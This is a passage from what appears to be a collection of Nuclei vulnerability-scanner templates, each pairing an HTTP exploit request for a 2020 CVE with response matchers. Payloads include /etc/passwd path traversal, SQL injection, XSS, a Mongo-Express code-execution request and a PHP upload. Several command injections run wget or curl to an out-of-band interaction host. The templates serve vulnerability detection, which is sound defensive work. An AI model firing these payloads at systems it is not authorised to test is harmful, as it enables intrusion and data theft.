boundary=----WebKitFormBoundaryoZ8meKnrrso89R6Y\n\n------WebKitFormBoundaryoZ8meKnrrso89R6Y\nContent-Disposition: form-data; name=\"jarfile\"; filename=\"../../../../../../../tmp/poc\"\n\n{{randstr}}\n------WebKitFormBoundaryoZ8meKnrrso89R6Y--\n","GET /jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252ftmp%252fpoc HTTP/1.1\n"],"matchers":[{"type":"dsl","dsl":["contains(body_2, \"{{randstr}}\") && status_code == 200"]}]}]},{"id":"CVE-2020-5405","info":{"name":"Spring Cloud Config - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/a/b/%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-11450","info":{"name":"MicroStrategy Web 10.4 - Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/MicroStrategyWS/happyaxis.jsp"],"redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Axis2 Happiness Page","Examining webapp configuration","Essential Components"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-16846","info":{"name":"SaltStack <=3002 - Shell Injection","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/run"],"body":"token=1337&client=ssh&tgt=*&fun=a&roster={{roaster}}&ssh_priv={{priv}}","headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["regex(\"CherryPy\\/([0-9.]+)\", header) || regex(\"CherryPy ([0-9.]+)\", body)"]},{"type":"word","part":"body","words":["An unexpected error occurred"]},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2020-13700","info":{"name":"WordPresss acf-to-rest-api <=3.1.0 - Insecure Direct Object Reference","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-json/acf/v3/options/a?id=active&field=plugins"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["Content-Type: application/json"]},{"type":"word","part":"body","words":["acf-to-rest-api\\/class-acf-to-rest-api.php"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-28185","info":{"name":"TerraMaster TOS < 4.2.06 - User Enumeration","severity":"medium"},"requests":[{"raw":["GET /tos/index.php?user/login HTTP/1.1\nHost: {{Hostname}}\n","POST /wizard/initialise.php HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-Requested-With: XMLHttpRequest\nReferer: {{RootURL}}/tos/index.php?user/login\n\ntab=checkuser&username=admin\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"username\":","\"email\":","\"status\":"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","part":"body_2","regex":["\"username\":\"(.*?)\"","\"email\":\"(.*?)\""]}]}]},{"id":"CVE-2020-11546","info":{"name":"SuperWebmailer 7.21.0.01526 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /mailingupgrade.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nstep=1&Language=de{${system(\"ls\")}}&NextBtn=Weiter+%3E\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["ajax_ccea.php","ajax_getemailingactions.php","ajax_getemailtemplates.php"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-28188","info":{"name":"TerraMaster TOS - Unauthenticated Remote Command Execution","severity":"critical"},"requests":[{"raw":["GET /include/makecvs.php?Event=%60curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'%60 HTTP/1.1\nHost: {{Hostname}}\n","GET /tos/index.php?explorer/pathList&path=%60curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'%60 HTTP/1.1\nHost: {{Hostname}}\n"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: {{useragent}}"]}]}]},{"id":"CVE-2020-12478","info":{"name":"TeamPass 2.1.27.36 - Improper Authentication","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/files/ldap.debug.txt"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Get all LDAP params"]},{"type":"word","part":"header","words":["text/plain"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-26073","info":{"name":"Cisco SD-WAN vManage Software - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/dataservice/disasterrecovery/download/token/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2Fetc%2Fpasswd"],"matchers-condition":"and","matchers":[{"type":"status","status":[200]},{"type":"regex","regex":["root:.*:0:0:"],"part":"body"}]}]},{"id":"CVE-2020-10547","info":{"name":"rConfig 3.9.4 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/compliancepolicyelements.inc.php?search=True&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL,NULL,NULL+--+&searchColumn=elementName&searchOption=contains"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["[project-discovery]"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-15129","info":{"name":"Traefik - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"headers":{"X-Forwarded-Prefix":"https://foo.nl"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<a href=\"https://foo.nl/dashboard/\">Found</a>"]},{"type":"status","status":[302]}]}]},{"id":"CVE-2020-35713","info":{"name":"Belkin Linksys RE6500 <1.0.012.001 - Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /goform/setSysAdm HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}/login.shtml\n\nadmuser=admin&admpass=;wget http://{{interactsh-url}};&admpasshint=61646D696E=&AuthTimeout=600&wirelessMgmt_http=1\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2020-5191","info":{"name":"PHPGurukul Hospital Management System - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /hospital/hms/admin/index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}&submit=&submit=\n","POST /hospital/hms/admin/doctor-specilization.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ndoctorspecilization=%3C%2Ftd%3E%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E%3Ctd%3E&submit=\n"],"cookie-reuse":true,"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<td class=\"hidden-xs\"></td><script>alert(document.domain);</script><td>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-17362","info":{"name":"Nova Lite < 1.3.9 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?s=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"body","words":["nova-lite"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-24391","info":{"name":"Mongo-Express - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","POST /checkValid HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ndocument=++++++++++++%28%28%29+%3D%3E+%7B%0A++++++++const+process+%3D+clearImmediate.constructor%28%22return+process%3B%22%29%28%29%3B%0A++++++++const+result+%3D+process.mainModule.require%28%22child_process%22%29.execSync%28%22id+%3E+build%2Fcss%2F{{randstr}}.css%22%29%3B%0A++++++++console.log%28%22Result%3A+%22+%2B+result%29%3B%0A++++++++return+true%3B%0A++++%7D%29%28%29++++++++\n","GET /public/css/{{randstr}}.css HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"matchers-condition":"and","matchers":[{"type":"regex","part":"body_3","regex":["((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","regex":["((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)"]}]}]},{"id":"CVE-2020-27986","info":{"name":"SonarQube - Authentication Bypass","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/settings/values"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["email.smtp_host.secured","email.smtp_password.secured","email.smtp_port.secured","email.smtp_username.secured"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-13405","info":{"name":"Microweber <1.1.20 - Information Disclosure","severity":"high"},"requests":[{"raw":["POST /module/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nReferer: {{BaseURL}}admin/view:modules/load_module:users\n\nmodule={{endpoint}}\n"],"payloads":{"endpoint":["users/controller","modules/users/controller","/modules/users/controller"]},"matchers":[{"type":"dsl","dsl":["contains(body,\"username\")","contains(body,\"password\")","contains(body,\"password_reset_hash\")","status_code==200","contains(header,\"text/html\")"],"condition":"and"}]}]},{"id":"CVE-2020-23697","info":{"name":"Monstra CMS 3.0.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /admin/index.php?id=dashboard HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlogin={{username}}&password={{password}}&login_submit=Log+In\n","GET /admin/index.php?id=pages&action=add_page HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n","POST /admin/index.php?id=pages&action=add_page HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ncsrf={{csrf}}&page_title=%22%27%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&page_name={{string}}&page_meta_title=&page_keywords=&page_description=&pages=0&templates=index&status=published&access=public&editor=test&page_tags=&add_page_and_exit=Save+and+Exit&page_date=2023-01-09+18%3A22%3A15\n","GET /{{string}} HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["contains(header_4, \"text/html\")","status_code_4 == 200","contains(body_4, \"><script>alert(document.domain)</script>\") && contains(body_4, \"Monstra\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"csrf","group":1,"regex":["id=\"csrf\" name=\"csrf\" value=\"(.*)\">"],"internal":true,"part":"body"}]}]},{"id":"CVE-2020-19360","info":{"name":"FHEM 6.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/fhem/FileLog_logWrapper?dev=Logfile&file=%2fetc%2fpasswd&type=text"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-35749","info":{"name":"WordPress Simple Job Board <2.9.4 - Local File Inclusion","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/post.php?post=372&action=edit&sjb_file=../../../../etc/passwd HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-9484","info":{"name":"Apache Tomcat Remote Command Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.jsp"],"headers":{"Cookie":"JSESSIONID=../../../../../usr/local/tomcat/groovy"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Exception","ObjectInputStream","PersistentManagerBase"],"condition":"and"},{"type":"status","status":[500]}]}]},{"id":"CVE-2020-7209","info":{"name":"LinuxKI Toolset <= 6.01 - Remote Command Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/linuxki/experimental/vis/kivis.php?type=kitrace&pid=0;echo%20START;cat%20/etc/passwd;echo%20END;"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2020-8163","info":{"name":"Ruby on Rails <5.0.1 - Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}?IO.popen(%27cat%20%2Fetc%2Fpasswd%27).read%0A%23"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-8209","info":{"name":"Citrix XenMobile Server - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/jsp/help-sb-download.jsp?sbFileName=../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["fileDownload=true","application/octet-stream","attachment;"],"condition":"and"},{"type":"regex","part":"body","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2020-26258","info":{"name":"XStream <1.4.15 - Server-Side Request Forgery","severity":"high"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\n\n<map>\n  <entry>\n    <jdk.nashorn.internal.objects.NativeString>\n      <flags>0</flags>\n      <value class='com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'>\n        <dataHandler>\n          <dataSource class='javax.activation.URLDataSource'>\n            <url>http://{{interactsh-url}}/internal/:</url>\n          </dataSource>\n          <transferFlavors/>\n        </dataHandler>\n        <dataLen>0</dataLen>\n      </value>\n    </jdk.nashorn.internal.objects.NativeString>\n    <string>test</string>\n  </entry>\n</map>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: Java"]}]}]},{"id":"CVE-2020-17456","info":{"name":"SEOWON INTECH SLC-130 & SLR-120S - Unauthenticated Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /cgi-bin/login.cgi HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}\nContent-Type: application/x-www-form-urlencoded\n\nbrowserTime=081119502020&currentTime=1597159205&expires=Wed%252C%2B12%2BAug%2B2020%2B15%253A20%253A05%2BGMT&Command=Submit&user=admin&password=admin\n","POST /cgi-bin/system_log.cgi HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nCommand=Diagnostic&traceMode=ping&reportIpOnly=&pingIpAddr=;curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'&pingPktSize=56&pingTimeout=30&pingCount=4&maxTTLCnt=30&queriesCnt=3&reportIpOnlyCheckbox=on&logarea=com.cgi&btnApply=Apply&T=1646950471018\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: {{useragent}}"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-22840","info":{"name":"b2evolution CMS <6.11.6 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/email_passthrough.php?email_ID=1&type=link&email_key=5QImTaEHxmAzNYyYvENAtYHsFu7fyotR&redirect_to=http%3A%2F%2Finteract.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_]*\\.)?interact\\.sh(?:\\s*?)$"]}]}]},{"id":"CVE-2020-29284","info":{"name":"Sourcecodester Multi Restaurant Table Reservation System 1.0 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/dashboard/view-chair-list.php?table_id='+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+-"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["duration>=6"]},{"type":"word","part":"body","words":["Restaurent Tables","Chair List"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-9054","info":{"name":"Zyxel NAS Firmware 5.21- Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/weblogin.cgi?username=admin';cat /etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-14882","info":{"name":"Oracle Weblogic Server - Remote Command Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/console/images/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext('http://{{interactsh-url}}')"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["ADMINCONSOLESESSION"]},{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2020-24550","info":{"name":"EpiServer Find <13.2.7 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/find_v2/_click?_t_id=&_t_q=&_t_hit.id=&_t_redirect=https://interact.sh"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["Location: https://interact.sh"]},{"type":"status","status":[301]}]}]},{"id":"CVE-2020-13121","info":{"name":"Submitty <= 20.04.01 - Open Redirect","severity":"medium"},"requests":[{"raw":["POST /authentication/check_login?old=http%253A%252F%252Fexample.com%252Fhome HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nReferer: {{RootURL}}/authentication/login\n\nuser_id={{username}}&password={{password}}&stay_logged_in=on&login=Login\n"],"cookie-reuse":true,"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2020-18268","info":{"name":"Z-Blog <=1.5.2 - Open Redirect","severity":"medium"},"requests":[{"raw":["POST /zb_system/cmd.php?act=verify HTTP/1.1\nHost: {{Hostname}}\nContent-Length: 81\nContent-Type: application/x-www-form-urlencoded\nConnection: close\n\nbtnPost=Log+In&username={{username}}&password={{md5(\"{{password}}\")}}&savedate=0\n","GET /zb_system/cmd.php?atc=login&redirect=http://www.interact.sh HTTP/2\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2020-6171","info":{"name":"CLink Office 2.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}?lang=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3Cp%20class=%22&p=1"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"></script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-8194","info":{"name":"Citrix ADC and Citrix NetScaler Gateway - Remote Code Injection","severity":"medium"},"requests":[{"raw":["GET /menu/guiw?nsbrand=1&protocol=nonexistent.1337\">&id=3&nsvpx=phpinfo HTTP/1.1\nHost: {{Hostname}}\nCookie: startupapp=st\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<jnlp codebase=\"nonexistent.1337\">"]},{"type":"word","part":"header","words":["application/x-java-jnlp-file"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-13820","info":{"name":"Extreme Management Center 8.4.1.24 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/OneView/view/center?a%27+type%3d+%27text%27+autofocus+onfocus%3d%27alert(document.domain)"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["autofocus onfocus='alert(document.domain)","Extreme Management Center"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-13258","info":{"name":"Contentful <=2020-05-21 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /?cda'\"</script><script>alert(document.domain)</script>&locale=locale=de-DE HTTP/1.1 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["{'api': '","</script><script>alert(document.domain)</script>',"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-26214","info":{"name":"Alerta < 8.1.0 - Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/config"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["compare_versions(version, '< 8.1.0')"]},{"type":"word","part":"body","words":["\"alarm_model\"","\"actions\"","\"severity\""],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"version","group":1,"regex":["\"name\": \"Alerta ([0-9.]+)\""],"internal":true},{"type":"regex","group":1,"regex":["\"name\": \"Alerta ([0-9.]+)\""]}]}]},{"id":"CVE-2020-11110","info":{"name":"Grafana <= 6.7.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /api/snapshots HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json, text/plain, */*\nAccept-Language: en-US,en;q=0.5\nReferer: {{BaseURL}}\ncontent-type: application/json\nConnection: close\n\n{\"dashboard\":{\"annotations\":{\"list\":[{\"name\":\"Annotations & Alerts\",\"enable\":true,\"iconColor\":\"rgba(0, 211, 255, 1)\",\"type\":\"dashboard\",\"builtIn\":1,\"hide\":true}]},\"editable\":true,\"gnetId\":null,\"graphTooltip\":0,\"id\":null,\"links\":[],\"panels\":[],\"schemaVersion\":18,\"snapshot\":{\"originalUrl\":\"javascript:alert('Revers3c')\",\"timestamp\":\"2020-03-30T01:24:44.529Z\"},\"style\":\"dark\",\"tags\":[],\"templating\":{\"list\":[]},\"time\":{\"from\":null,\"to\":\"2020-03-30T01:24:53.549Z\",\"raw\":{\"from\":\"6h\",\"to\":\"now\"}},\"timepicker\":{\"refresh_intervals\":[\"5s\",\"10s\",\"30s\",\"1m\",\"5m\",\"15m\",\"30m\",\"1h\",\"2h\",\"1d\"],\"time_options\":[\"5m\",\"15m\",\"1h\",\"6h\",\"12h\",\"24h\",\"2d\",\"7d\",\"30d\"]},\"timezone\":\"\",\"title\":\"Dashboard\",\"uid\":null,\"version\":0},\"name\":\"Dashboard\",\"expires\":0}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json"]},{"type":"word","part":"body","words":["\"deleteKey\":","\"deleteUrl\":"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","group":1,"regex":["\"url\":\"([a-z:/0-9A-Z]+)\""],"part":"body"}]}]},{"id":"CVE-2020-8771","info":{"name":"WordPress Time Capsule < 1.21.16 - Authentication Bypass","severity":"critical"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nConnection: close\nAccept: */*\n\nIWP_JSON_PREFIX\n","GET /wp-admin/index.php HTTP/1.1\nHost: {{Hostname}}\nConnection: close\nAccept: */*\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<div id=\"adminmenumain\" role=\"navigation\" aria-label=\"Main menu\">","<h1>Dashboard</h1>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","regex":["wordpress_[a-z0-9]+=([A-Za-z0-9%]+)"],"part":"header"}]}]},{"id":"CVE-2020-17463","info":{"name":"Fuel CMS 1.4.7 - SQL Injection","severity":"critical"},"requests":[{"raw":["GET /fuel/login/ HTTP/1.1\nHost: {{Hostname}}\n","POST /fuel/login/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nReferer: {{RootURL}}\n\nuser_name={{username}}&password={{password}}&Login=Login&forward=\n","@timeout: 10s\nGET /fuel/pages/items/?search_term=&published=&layout=&limit=50&view_type=list&offset=0&order=asc&col=location+AND+(SELECT+1340+FROM+(SELECT(SLEEP(6)))ULQV)&fuel_inline=0 HTTP/1.1\nHost: {{Hostname}}\nX-Requested-With: XMLHttpRequest\nReferer: {{RootURL}}\n"],"payloads":{"username":["admin"],"password":["admin"]},"attack":"pitchfork","cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["duration>=6","status_code_3 == 200","contains(body_1, \"FUEL CMS\")"],"condition":"and"}]}]},{"id":"CVE-2020-15500","info":{"name":"TileServer GL <=3.0.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?key=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss%27%29%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["'>\"<svg/onload=confirm('xss')>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-9315","info":{"name":"Oracle iPlanet Web Server 7.0.x - Authentication Bypass","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/admingui/version/serverTasksGeneral?serverTasksGeneral.GeneralWebserverTabs.TabHref=2","{{BaseURL}}/admingui/version/serverConfigurationsGeneral?serverConfigurationsGeneral.GeneralWebserverTabs.TabHref=4"],"matchers-condition":"and","matchers":[{"type":"word","words":["Admin Console"]},{"type":"word","words":["serverConfigurationsGeneral","serverCertificatesGeneral"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-13117","info":{"name":"Wavlink Multiple AP - Remote Command Injection","severity":"critical"},"requests":[{"raw":["POST /cgi-bin/login.cgi HTTP/1.1\nHost: {{Hostname}}\nOrigin: http://{{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nAccept-Encoding: gzip, deflate\n\nnewUI=1&page=login&username=admin&langChange=0&ipaddr=192.168.1.66&login_page=login.shtml&homepage=main.shtml&sysinitpage=sysinit.shtml&hostname=wifi.wavlink.com&key=%27%3B%60wget+http%3A%2F%2F{{interactsh-url}}%3B%60%3B%23&password=asd&lang_select=en\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"body","words":["parent.location.replace"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-22209","info":{"name":"74cms - ajax_common.php SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/plus/ajax_common.php?act=hotword&query=aa%\u9326%27%20union%20select%201,md5({{num}}),3%23%27"],"matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]}]}]},{"id":"CVE-2020-28871","info":{"name":"Monitorr 1.7.6m - Unauthenticated Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /assets/php/upload.php HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nAccept: text/plain, */*; q=0.01\nConnection: close\nAccept-Language: en-US,en;q=0.5\nX-Requested-With: XMLHttpRequest\nContent-Type: multipart/form-data; boundary=---------------------------31046105003900160576454225745\nOrigin: http://{{Hostname}}\nReferer: http://{{Hostname}}\n\n-----------------------------31046105003900160576454225745\nContent-Disposition: form-data; name=\"fileToUpload\"; filename=\"{{randstr}}.php\"\nContent-Type: image/gif\n\nGIF89a213213123<?php echo md5('CVE-2020-28871');unlink(__FILE__); ?>\n\n-----------------------------31046105003900160576454225745--\n","GET /assets/data/usrimg/{{tolower(\"{{randstr}}.php\")}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["d03c180355b797069cc047ff5606d689"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-35598","info":{"name":"Advanced Comment System 1.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/advanced_component_system/index.php?ACS_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-12720","info":{"name":"vBulletin SQL Injection","severity":"critical"},"requests":[{"raw":["POST /ajax/api/content_infraction/getIndexableContent HTTP/1.1\nHost: {{Hostname}}\nX-Requested-With: XMLHttpRequest\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\nnodeId%5Bnodeid%5D=1%20union%20select%201%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2CCONCAT%28%27vbulletin%27%2C%27rce%27%2C%40%40version%29%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27--+-\n"],"matchers":[{"type":"word","words":["vbulletinrce"]}]}]},{"id":"CVE-2020-10770","info":{"name":"Keycloak <= 12.0.1 - request_uri Blind Server-Side Request Forgery 